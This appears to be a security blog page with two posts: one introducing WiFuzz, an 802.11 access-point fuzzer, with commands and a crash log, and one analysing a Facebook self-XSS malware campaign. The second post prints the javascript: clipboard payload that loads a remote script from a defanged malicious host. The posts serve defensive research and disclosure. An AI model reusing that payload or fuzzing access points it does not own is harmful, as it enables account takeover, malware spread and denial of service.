Testing wireless access points

2 comments
Nowadays, wireless devices are ubiquitous. Despite the widespread diffusion of this technology,  the security of wireless systems still needs a thorough scrutiny, in particular at the 802.11 network stack level.

Today we introduce WiFuzz, a very simple but nifty tool for testing wireless access point (AP) devices. WiFuzz generates "fuzzy" 802.11 network packets to trigger corner-case errors in the AP 802.11 stack.


How it works?
WiFuzz is written entirely in Python, and leverages the Scapy library for packet generation. To use WiFuzz, the network card driver must support traffic injection. Moreover, the wi-fi interface must be put into "monitor mode"; as an example, with my NIC these commands do the job:
$ sudo rmmod iwlagn
$ sudo modprobe iwlagn
$ sudo ifconfig wlan0 down
$ sudo iwconfig wlan0 mode monitor
$ sudo ifconfig wlan0 up
Only two mandatory parameters are required before starting to fuzz: the fuzzer type, and the SSID of the target AP.

WiFuzz is somehow a "stateful" fuzzer: depending on the chosen fuzzer type, it first moves to a suitable 802.11 state before starting to fuzz the AP. As an example, 802.11 Association requests are fuzzed with the "assoc" fuzzer, that first moves to the "probed" state, then authenticates with the AP ("authenticated" state), and finally starts to fuzz Association packets. Available fuzzers are visible in the following screenshot.

WiFuzz help screen
Fortunately, state transitions are handled transparently by the tool, so you can just forget them ;-) For example, to fuzz the AP identified by the "TestMe" SSID the following syntax can be used:
$ sudo python wifuzz.py -s TestMe assoc
To detect AP crashes, WiFuzz periodically listens for Beacon frames from the target access point: if no Beacon is received, WiFuzz assumes the target has crashed, and a PCAP test case is generated to reproduce the crash. Test cases can be replayed using the wireply.py utility.

Use case
Here is a brief example of WiFuzz in action. In this scenario, we used WiFuzz to test the access point with SSID "TestMe".

$ sudo python wifuzz.py -s TestMe auth
Wed Sep 28 10:38:36 2011 {MAIN} Target SSID: TestMe; Interface: wlan0; Ping timeout: 60; PCAP directory: /dev/shm; Test mode? False; Fuzzer(s): auth;
Wed Sep 28 10:38:36 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:38:36 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:38:36 2011 {WIFI} Starting fuzz 'auth'
Wed Sep 28 10:38:36 2011 {WIFI} [R00001] Sending packets 1-100
Wed Sep 28 10:38:50 2011 {WIFI} [R00001] Checking if the AP is still up...
Wed Sep 28 10:38:50 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:38:50 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:38:50 2011 {WIFI} [R00002] Sending packets 101-200
Wed Sep 28 10:39:04 2011 {WIFI} [R00002] Checking if the AP is still up...
Wed Sep 28 10:39:04 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:39:04 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:39:04 2011 {WIFI} [R00003] Sending packets 201-300
Wed Sep 28 10:39:18 2011 {WIFI} [R00003] Checking if the AP is still up...
Wed Sep 28 10:39:18 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:39:19 2011 {WIFI} Beacon from SSID=[TestMe] found (MAC=[00:aa:bb:cc:dd:ee])
Wed Sep 28 10:39:19 2011 {WIFI} [R00004] Sending packets 301-400
Wed Sep 28 10:39:42 2011 {WIFI} [R00004] recv() timeout exceeded! (packet #325)
Wed Sep 28 10:39:42 2011 {WIFI} [R00004] Checking if the AP is still up...
Wed Sep 28 10:39:42 2011 {WIFI} Waiting for a beacon from SSID=[TestMe]
Wed Sep 28 10:40:42 2011 {WIFI} [!] The AP does not respond anymore. Latest test-case has been written to '/dev/shm/wifuzz-eK97nb.pcap'

The AP has been tested using the "auth" module (802.11 Authentication Request fuzzer). In this case, the AP has crashed after roughly 325 packets, and a PCAP file with all the generated packets since the beginning of the last fuzz round has been written to "/dev/shm/wifuzz-eK97nb.pcap".

Conclusions
We use WiFuzz in our daily activities, and it lead to the identification of some interesting wireless bugs. The tool is available here, and it is released under the GPL license. so feel free to contribute!

Facebook malware on the rise

0 comments
Today, many Italian users found on their Facebook profiles some links similar to the one depicted below. For non-Italian speakers, the text can be translated as "Facebook security check. To see the video, follow these steps".


When the "Continue" button is pressed, the following form is displayed:


Here is the translation:
  1. Select the address bar
  2. Press 'j' on the keyboard
  3. Press (CTRL+V) and press ENTER
What happens under the hood is quite simple, and similar to other Facebook malware. The link posted on the victim's Facebook profile refers to a malicious SWF file (hxxp://www.cowboysaliensstreaming.com/tag/test.swf) which displays the two dialogs depicted above. Once executed, the applet also fills the clipboard with the text:

avascript:(a=(b=document).createElement(\'script\')).src=\'hxxp://www.cowboysaliensstreaming.com/tag/fb.php\',b.body.appendChild(a);void(0)

Then, the SWF asks the user to click on the address bar, press 'j' and then CTRL+V. The result is that the following text is copied in the address bar:

javascript:(a=(b=document).createElement(\'script\')).src=\'hxxp://www.cowboysaliensstreaming.com/tag/fb.php\',b.body.appendChild(a);void(0)

As a consequence, a piece of Javascript code is executed that can interact with the Facebook DOM document. The Javascript code fragment creates a new HTML <script> element which loads the resource stored at hxxp://www.cowboysaliensstreaming.com/tag/fb.php. The malicious resource spreads the malware to the Facebook friends of the victim, and eventually displays some spam links:


For those who are interested, a copy of the malicious Javascript code can be found here.

So nothing is really new with this sample: the same techniques have already been used several times in the past. What is astonishing is the number of victims: despite Internet users should be now familiar with these trivial threats, there have been more and more (mostly Italian) Facebook users who carefully followed the instructions of the malware, without even thinking about why they should ever copy a strange string in the address bar to see a YouTube video.